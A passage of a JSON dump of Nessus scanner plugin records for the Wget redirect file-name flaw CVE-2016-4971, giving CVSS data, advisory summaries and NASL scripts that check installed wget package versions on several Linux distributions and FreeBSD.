Linux 7.3 Release Notes linked from the References section.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-11-28T00:00:00", "type": "nessus", "title": "CentOS 7 : wget (CESA-2016:2587)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:wget", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2016-2587.NASL", "href": "https://www.tenable.com/plugins/nessus/95333", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2587 and \n# CentOS Errata and Security Advisory 2016:2587 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95333);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"RHSA\", value:\"2016:2587\");\n\n script_name(english:\"CentOS 7 : wget (CESA-2016:2587)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for\nHTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* It was found that wget used a file name provided by the server for\nthe downloaded file when following an HTTP redirect to a FTP server\nresource. This could cause wget to create a file with a different name\nthan expected, possibly allowing the server to execute arbitrary code\non the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.3 Release Notes linked from the References section.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2016-November/003557.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?95846b31\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4971\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"wget-1.14-13.el7\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-13T14:41:10", "description": "Dawid Golunski discovered that Wget incorrectly handled filenames when being redirected from an HTTP to an FTP URL. A malicious server could possibly use this issue to overwrite local files.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-21T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 15.10 / 16.04 LTS : wget vulnerability (USN-3012-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:wget", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-3012-1.NASL", "href": "https://www.tenable.com/plugins/nessus/91728", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3012-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91728);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"USN\", value:\"3012-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 15.10 / 16.04 LTS : wget vulnerability (USN-3012-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Dawid Golunski discovered that Wget incorrectly handled filenames when\nbeing redirected from an HTTP to an FTP URL. A malicious server could\npossibly use this issue to overwrite local files.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3012-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|15\\.10|16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 15.10 / 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"wget\", pkgver:\"1.13.4-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"wget\", pkgver:\"1.15-1ubuntu1.14.04.2\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"wget\", pkgver:\"1.16.1-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"wget\", pkgver:\"1.17.1-1ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T16:39:06", "description": "New wget packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-14T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : wget (SSA:2016-165-01)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:wget", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2016-165-01.NASL", "href": "https://www.tenable.com/plugins/nessus/91573", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-165-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91573);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"SSA\", value:\"2016-165-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : wget (SSA:2016-165-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New wget packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.532542\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6d535496\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T16:40:25", "description": "Updated to 1.18 due to CVE-2016-4971\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-14T00:00:00", "type": "nessus", "title": "Fedora 22 : wget (2016-24135dfe43)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wget", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-24135DFE43.NASL", "href": "https://www.tenable.com/plugins/nessus/92068", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-24135dfe43.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92068);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"FEDORA\", value:\"2016-24135dfe43\");\n\n script_name(english:\"Fedora 22 : wget (2016-24135dfe43)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated to 1.18 due to CVE-2016-4971\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-24135dfe43\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"wget-1.18-1.fc22\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T16:40:08", "description": "GNU Wget contains a flaw that is triggered when handling server redirects to FTP resources, as the destination filename is obtained from the redirected URL and not original URL. With a specially crafted response, a context-dependent attacker may cause another filename to be used than intended, effectively allowing the attacker to execute arbitrary code.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-12T00:00:00", "type": "nessus", "title": "wget < 1.18 Arbitrary Code Execution", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-12T00:00:00", "cpe": [], "id": "802003.PRM", "href": "https://www.tenable.com/plugins/lce/802003", "sourceData": "Binary data 802003.prm", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T16:39:56", "description": "Giuseppe Scrivano reports :\n\nOn a server redirect from HTTP to a FTP resource, wget would trust the HTTP server and uses the name in the redirected URL as the destination filename.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-22T00:00:00", "type": "nessus", "title": "FreeBSD : wget -- HTTP to FTP redirection file name confusion vulnerability 